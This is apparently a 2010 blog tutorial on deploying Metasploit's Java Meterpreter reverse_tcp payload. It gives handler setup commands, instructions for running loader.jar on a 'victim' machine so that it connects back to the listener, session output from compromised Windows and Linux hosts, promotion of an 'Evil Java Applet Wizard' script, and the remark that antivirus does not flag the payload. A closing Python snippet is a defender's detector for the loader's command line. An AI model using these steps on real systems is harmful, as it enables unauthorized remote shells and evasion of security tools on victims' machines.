Metasploit JAVA meterpreter payload

If you haven’t noticed, the Metasploit Framework has had a JAVA meterpreter payload for some time now.
It supports all the commands supported by the PHP meterpreter, as of SVN revision 9777, and additionally the ipconfig, route, and screenshot commands.
It is not fully integrated into the framework yet, and in order to get it up and running some manual tweaking is needed.
In this post I will show how to set it up and use it.
Furthermore, I have recreated my “Evil java applet wizard” to automate the process of getting it up and running.
The script now supports a full java attack which includes the client side applet attack and uses the meterpreter java payload instead of a binary executable.
Registered members can download the script at the end of this post (Script updated Aug 17).
Why use a java meterpreter, you ask?
Well…you’ll see later…
Requirements:
JRE 1.2 on the victim machine is enough, although some features, like routing tables or screenshots, require JRE 1.3, JRE 1.4 or JRE 1.6.
You can find the java meterpreter payload jar file in:
"/pentest/exploits/framework3/data/java/loader.jar"
You will also need the “JavaMeterpreter.zip” file which you can download from HERE
I have just noticed that manual tweaking is no longer necessary: the Metasploit framework now has the java meterpreter listener built in.
That means you can skip steps 1 to 4,
and instead of using the patched php meterpreter you can use the java meterpreter directly.
I have also updated the script to use the java payload as well.

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 578 exploits - 297 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r10024 updated today (2010.08.17)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (java/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) >
Let's see how to set it up manually...
1. Download
root@Blackbox:~# cd /tmp/
root@Blackbox:/tmp# wget https://www.metasploit.com/redmine/attachments/397/JavaMeterpreter.zip --no-check-certificate
2. Unzip
root@Blackbox:/tmp# unzip JavaMeterpreter.zip
3. Copy necessary files
root@Blackbox:/tmp# cd extensions/
root@Blackbox:/tmp/extensions# cp {ext_server_stdapi.jar,meterpreter.jar} /pentest/exploits/framework3/data/meterpreter
4. Back up the PHP Meterpreter files and change the jar file extensions to php (this will break PHP Meterpreter support)
root@Blackbox:/tmp/extensions# cd /pentest/exploits/framework3/data/meterpreter

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.php meterpreter.phpx

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.php ext_server_stdapi.phpx

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.jar meterpreter.php

root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.jar ext_server_stdapi.php
5. Launch msfconsole and set up a multi/handler listener with a "php/meterpreter/reverse_tcp" payload.
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# cd ..
root@Blackbox:/pentest/exploits/framework3/data# cd ..
root@Blackbox:/pentest/exploits/framework3# ./msfconsole

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 577 exploits - 295 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9993 updated today (2010.08.13)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
6. Copy (transfer) “/pentest/exploits/framework3/data/java/loader.jar” to the victim pc and run it as follows
C:\Documents and Settings\NightRanger>java -jar loader.jar
Usage: java -jar loader.jar []
C:\Documents and Settings\NightRanger>java -jar loader.jar 192.168.1.104 4444
7. Get your Meterpreter JAVA Shell…
[*] Sending stage (21717 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.106:1435) at Sat Aug 14 20:34:57 +0300 2010

meterpreter > sysinfo
Computer: exploit
OS : Windows XP 5.1 (x86)
meterpreter > getuid
Server username: NightRanger
meterpreter >
P.S.:
The java meterpreter works on linux systems as well…
root@Blackbox:/pentest/exploits/framework3/data/java# java -jar loader.jar 192.168.1.104 4444
meterpreter > exit

[*] Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) > rexploit

[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
[*] Sending stage (21717 bytes) to 192.168.1.104
[*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.104:59806) at Sat Aug 14 20:47:40 +0300 2010

meterpreter > sysinfo
Computer: Blackbox
OS : Linux 2.6.34 (i386)
meterpreter > getuid
Server username: root
meterpreter >
I have modified my “Evil Java Applet Wizard” script to use the JAVA Meterpreter Payload instead of a binary executable.
The reasons for that are:
1. Antivirus software will not detect JAVA Meterpreter as a malicious file (as you can see in the demo video below).
2. It makes sense to use the Java Meterpreter payload if you are already using the JAVA Applet client side attack vector.
If the applet attack worked, it means that the victim has Java installed on his system, which allows us to use this payload.
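Since the jar itself is not flagged by file-based antivirus, the practical way to catch the behaviour shown above on the defender's side is the launch pattern: a JRE process started as `java -jar <something>.jar <ip> <port>`, which is exactly how loader.jar receives the handler address on both Windows and Linux. The Python below is an added example, not part of this post or of Metasploit; the process-creation records and the function name are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation records: (host, user, command line).
# The first and third mimic the loader.jar invocations shown in this post;
# the other two are benign JAR launches that must not trigger.
SAMPLE_EVENTS = [
    ("exploit", "NightRanger", r"java -jar loader.jar 192.168.1.104 4444"),
    ("build01", "jenkins", r"java -jar jenkins.war --httpPort=8080"),
    ("Blackbox", "root", r"/usr/bin/java -jar /tmp/loader.jar 10.0.0.5 443"),
    ("ws02", "alice", r"javaw -jar C:\Tools\app.jar --config app.conf"),
]

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
# java or javaw (optionally .exe, optionally with a path prefix), then -jar,
# a .jar path, and a bare <ip> <port> pair as the only remaining arguments.
PATTERN = re.compile(
    rf"(?:^|[\\/\s])javaw?(?:\.exe)?\s+-jar\s+(\S+\.jar)\s+({IPV4})\s+(\d{{1,5}})\s*$",
    re.IGNORECASE,
)


@dataclass
class Finding:
    host: str
    user: str
    jar: str
    remote_ip: str
    remote_port: int


def find_java_reverse_connectors(events):
    """Return one Finding per event whose command line launches a JAR with a
    bare <ip> <port> argument pair, the shape of the Meterpreter loader call."""
    findings = []
    for host, user, cmdline in events:
        m = PATTERN.search(cmdline)
        if not m:
            continue
        jar, ip, port = m.group(1), m.group(2), int(m.group(3))
        # Discard syntactically impossible addresses/ports to cut false positives.
        if not 0 < port < 65536 or any(int(o) > 255 for o in ip.split(".")):
            continue
        findings.append(Finding(host, user, jar, ip, port))
    return findings


if __name__ == "__main__":
    for f in find_java_reverse_connectors(SAMPLE_EVENTS):
        print(f"{f.host}/{f.user}: {f.jar} -> {f.remote_ip}:{f.remote_port}")
```

Pairing a hit with a network-connection event from the same java process to the extracted ip:port gives a much stronger signal than the command line alone.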